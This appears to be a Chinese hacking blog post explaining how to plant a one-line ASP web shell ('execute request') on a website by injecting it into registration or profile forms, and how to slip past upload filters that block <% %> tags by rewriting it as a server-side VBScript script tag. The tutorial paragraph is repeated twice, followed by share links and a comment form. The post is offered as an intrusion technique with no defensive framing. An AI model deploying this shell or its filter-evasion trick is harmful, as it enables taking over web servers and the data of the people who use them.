0
来源:rootshell
很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。
使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。
不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。
这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。
首先:原程序代码是“<%execute request("l")%>", 我们可以把它的标签换下来。
然后改成"<S criptlanguage=VBScript runat=server>execute request("l")</Script>".。
这样就避开了使用〈%%〉,保存为.ASP,程序照样执行,效果是一样的。很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。

使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。
不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。
这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。
首先:原程序代码是“<%execute request("l")%>", 我们可以把它的标签换下来。
然后改成"<S criptlanguage=VBScript runat=server>execute request("l")</Script>".。
这样就避开了使用〈%%〉,保存为.ASP,程序照样执行,效果是一样的。
收藏本文到网摘: 添加到“Google书签” 添加到“Yahoo收藏” 添加到“QQ书签” 添加到“百度搜藏” 添加到“新浪ViVi收藏夹” 添加到“Del.icio.us” 添加到“365天天网摘” 添加到“天极网摘” 添加到“POCO网摘” 添加到“和讯网摘” 添加到“Bolaa博客收录中心” 添加到“igooi网摘” 添加到“天下图摘”
Tags: | 分类:小黑一把 | 来源:本站原创 | 引用(0)
发表评论
表情
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
打开HTML
打开UBB
打开表情
隐藏
记住我
昵称   密码   游客无需密码
网址   电邮   [注册]